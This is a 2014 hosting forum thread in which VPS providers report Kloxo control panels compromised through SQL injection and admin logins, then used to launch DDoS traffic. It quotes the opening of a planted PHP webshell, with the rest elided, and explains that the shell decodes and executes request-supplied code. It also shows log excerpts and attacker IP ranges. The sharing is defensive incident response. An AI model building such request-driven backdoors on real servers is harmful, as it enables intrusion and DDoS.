# Kloxo installations compromised



## Damian (Jan 28, 2014)

We had been considering dropping the Kloxo "Host In A Box" template anyway, since it hasn't been updated for 2+ years, but now the final nail has been driven into the coffin.

Our clients are getting their Kloxo installations compromised with a randomly-named PHP file placed into  ./home/kloxo/httpd/default/, which is the 'default' site accessible by IP address.

*UPDATE:* default.php in the same directory will also be compromised. See source here: http://disclosed.info/?9b00e7fa79636e07#rZKQYHUkErNv0ZFArSkUyBQ8C8YLSVaSsaRVo9nfypc=

This PHP file contains (also at http://disclosed.info/?7c12a1a4560b7664#5fpnfdknf4EfBcGqLjeV9/vAY1RXEKkLC3+fqm16c6E= ):




> <?php
> 
> set_time_limit(0);error_reporting(NULL);
> 
> ...



 

Where the $_REQUEST variable is a random value. The basic premise of the script is: if the specific $_REQUEST variable is set, then decode and run all of the code passed via variable. This is obviously bad.

 

All of the requests to run the script successfully have, thus far, come from: 176.31.146.168 (France, OVH Systems, OVH Systems, AS16276 OVH Systems, doesn't have rDNS)

 

Currently, these are being used to send extremely wimpy (20-40k pps, see http://d.pr/i/BXlo ) DDOS; the script used seems to be poorly written, as it slams CPU usage before it gets anywhere near maximum network utilization. We've had 4 instances this morning, and it's effected Ramnode, if not others. Beware!


----------



## peterw (Jan 28, 2014)

Second free panel which does have security issues.


----------



## Steven (Jan 28, 2014)

Important to note that the default.php file is owned by root.


----------



## vRozenSch00n (Jan 28, 2014)

Kloxo "Host In A Box" template is a disaster as it has never been upgraded for years. Moreover, regular user never upgrade new installation to the latest version (6.1.12) and they don't use any firewall.

Even the latest version has many vulnerabilities i.e. recursive bind, apache exploit through lxphp, brute force through the admin login and several other minor issues such as master/slave config that will break apache vhost configuration. 

AFAIK there was a disagreement among the developers, that leads to the Kloxo-MR fork.


----------



## SkylarM (Jan 28, 2014)

We don't provide that template, but just suspended like 15-20 containers for this. Killed CPU on nodes long before any massive network issues, but the amount of them caused a few fun times


----------



## Steven (Jan 28, 2014)

Null 178.248.23.0/24 on your network everyone.


----------



## vRozenSch00n (Jan 28, 2014)

My test VPS was also compromised with the same issue, and I found out from the log that they brute forced the control panel login. The log shows that it comes from IP 178.248.23.39


----------



## Steven (Jan 28, 2014)

It appears to be an sql Injection:
 



> access_log:178.248.23.58 - [26/Jan/2014:18:11:58 +0300] "_<snipped the inject>_ HTTP/1.1" 200 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0"



They are getting access the admin  user:
 



> login_success:12:27 Jan/27/2014: Successful Login to admin from 178.248.23.29



They are injecting files using display.php
 



> shell_exec:12:27 Jan/27/2014: 0: [(__system__:/usr/local/lxlabs/kloxo/httpdocs) 'chmod' '0644' '/home/kloxo/httpd/default/default.php']
> filesys:12:27 Jan/27/2014: Chown /home/kloxo/httpd/default/default.php to root:root



NOTE: default.php is being injected into 'every' account.


----------



## SkylarM (Jan 28, 2014)

I hate Kloxo. I hate zPanel. Ugh.


----------



## DaringHost (Jan 28, 2014)

Also just suspended a decent number of VPS's who were effected by this. I checked the admin access logs for one client and see that the admin account was accessed by these two IP addresses: 178.248.23.122 and 178.248.23.174

Nulled 178.248.23.0/24 across all servers.


----------



## vRozenSch00n (Jan 28, 2014)

@Steven It was an old vulnerability http://forum.lxcenter.org/index.php?t=msg&th=19215&prevloaded=1&&start=120


----------



## MannDude (Jan 28, 2014)

Protect yourselves,  but please don't post the actual exploit or method of injecting.


----------



## Steven (Jan 28, 2014)

vRozenSch00n said:


> @Steven It was an old vulnerability http://forum.lxcenter.org/index.php?t=msg&th=19215&prevloaded=1&&start=120


Yes its related to an old hack.

http://forum.lxcenter.org/index.php?t=msg&th=19215&goto=102646&#msg_102646

in specific.

Its being done via the webcommand.php which also calls those functions.


----------



## vRozenSch00n (Jan 28, 2014)

As I stated before, after the disagreement (which makes me sad  ), Kloxo development slowed down and Kloxo-MR managed to fork it's way to a more secure and stable control panel, with the ability to change php version on the fly and using nginx or varnish as reverse proxy.


----------



## wlanboy (Jan 28, 2014)

SkylarM said:


> I hate Kloxo. I hate zPanel. Ugh.


Second that - both are beyond any repair.


----------



## DomainBop (Jan 28, 2014)

Iniz sent out emails today requiring clients to remove Kloxo immediately.  Hopefully other hosts swill also ban the use of Kloxo (and ZPanel) and remove them from their templates.


----------



## DomainBop (Jan 28, 2014)

vRozenSch00n said:


> Moreover, regular user never upgrade new installation to the latest version (6.1.12) and they don't use any firewall.


A very large percentage of web sites are running outdated scripts that contain vulnerabilities, including many corporate websites (example: Wordpress 3.4.2 http://mybuys.com/readme.html).   It's not surprising that people/companies don't take the security of their websites seriously since many companies and government agencies allow their employees to surf the Internet from their desks using outdatedbrowsers that are full of vulnerabilities (I'm looking at a piwik report for one of my sites and I see a visitor from the US Postal Service who is using Internet Explorer 7)


----------



## MartinD (Jan 28, 2014)

This is wreaking havoc - totally come out of nowhere and gone nuts!


----------



## wlanboy (Jan 28, 2014)

DomainBop said:


> Iniz sent out emails today requiring clients to remove Kloxo immediately.  Hopefully other hosts swill also ban the use of Kloxo (and ZPanel) and remove them from their templates.


Tactical VPS did that too.

Templates are bad because they suggest (through the eyes of the customer) that they are save by default because the hoster is offering them.


----------



## vRozenSch00n (Jan 28, 2014)

wlanboy said:


> Second that - both are beyond any repair.


I don't know much about zPanel, but in Kloxo's case, there are a lot of rubbish files leftover and rubbish functions. This is due to the fact that late Ligesh wanted to integrate Windows and Debian functionalities (you should have seen the source code prior to version 6.1.6). It's also seems that the way he coded is based on in time patch.

Yes, it needs a whole lot of cleaning up or simply rewrite from scratch.


----------



## Keen (Jan 28, 2014)

SkylarM said:


> I hate Kloxo. I hate zPanel. Ugh.


I hate Iniz.

If I pay I decide what I want to use! Iniz promotes Vesta. Why?


----------



## Patrick (Jan 28, 2014)

Keen said:


> I hate Iniz.
> 
> If I pay I decide what I want to use! Iniz promotes Vesta. Why?


We recommended it as an alternative, it's up to you if you want to use it. No way did the email force people to use it.  Or we can let clients flood in tickets asking what do we use now or we give them an suggestion which has active development.

Hate is very strong word, unless of course you wish to continue using Kloxo where the malicious script sends out DDoS to bank of america (of which we won't allow which is why every VPS will be suspended every time there caught running it by the spike in load from the exploit) in which it can also lead to your sites being hacked if not already done by the attackers.


----------



## Francisco (Jan 28, 2014)

What a clusterfuck.

At peak we were pushing ~1.5M pps out over this crap.

A fairly big handful of nodes simply locked up from conntrack being so slammed.

Not a great thing to get woken up over. > 

Oh well, I got some adjustments in place that I wanted to.

Francisco


----------



## Mun (Jan 28, 2014)

Any idea whom they were attacking?


----------



## Patrick (Jan 28, 2014)

Mun said:


> Any idea whom they were attacking?


Bank Of America.


----------



## dcdan (Jan 28, 2014)

Yeah, we too have received a long list of attacking IPs from BOFA (although we cleared everything up a few hours before they sent the abuse report). We will be making changes to Nodewatch so that this type of attacks is detected automatically.


----------



## peterw (Jan 29, 2014)

A well prepared and executed attack. I hate old 0days that can catch such a lot of servers. At least every provider I am with was sending a email about shutting down all kloxo vps. Best thing to do is reinstalling the whole vps. You don't know if others add something else to your vps.


----------



## vRozenSch00n (Jan 29, 2014)

To avoid confusion:


*Kloxo Official* is the opensource version of former LxCenter's LxAdmin Enterprise, latest version is 6.1.12 (released in March 2012) only supports CentOS 5.x., unstable with lots of security issues.
*Kloxo HIB* *"Host-InA-Box"* is an old OpenVZ template, and it is an official LxCenter release as a replacement of *LxAdmin Host-InA-Box*, but it has never been upgraded since its release, only supports CentOS 5.x., unstable with lots of security issues. 
*Kloxo-MR* is a fork of Kloxo Official by Mustafa Ramadhan, it is actively developed, supports CentOS 5.x & 6.x. No known security issue.


----------



## keepass (Jan 29, 2014)

Hello,

Ok guys but how I can permamently disable KLOXO for VPS which will be create in future? I don't see option like this "Disable KLOXO button"


----------



## KuJoe (Jan 29, 2014)

keepass said:


> Hello,
> 
> Ok guys but how I can permamently disable KLOXO for VPS which will be create in future? I don't see option like this "Disable KLOXO button"


What do you mean? Can you be more specific in what you're trying to do?



vRozenSch00n said:


> *Kloxo-MR* is a fork of Kloxo Official by Mustafa Ramadhan, it is actively developed, supports CentOS 5.x & 6.x. No known security issue.


Looks like Rack911 found a critical root exploit within minutes of looking at the code. They won't do a free audit on the software but they recommend avoiding anything based off Kloxo including Kloxo-MR. So now I've been recommending a replacement that's not much better than the software being replaced.


----------



## Keen (Jan 30, 2014)

Vesta CP has a lot of installation issues, Kloxo-MR is better.


----------



## peterw (Jan 31, 2014)

Keen said:


> Vesta CP has a lot of installation issues, Kloxo-MR is better.


But not secure.


----------



## vRozenSch00n (Jan 31, 2014)

LXCenter has released Kloxo Version 6.1.13 http://project.lxcenter.org/news/25 to fix the bugs:


6.1.13 Sec #001 Fixed SQL Injection bug

6.1.13 Sec #002 Fixed Filemanager bug


----------

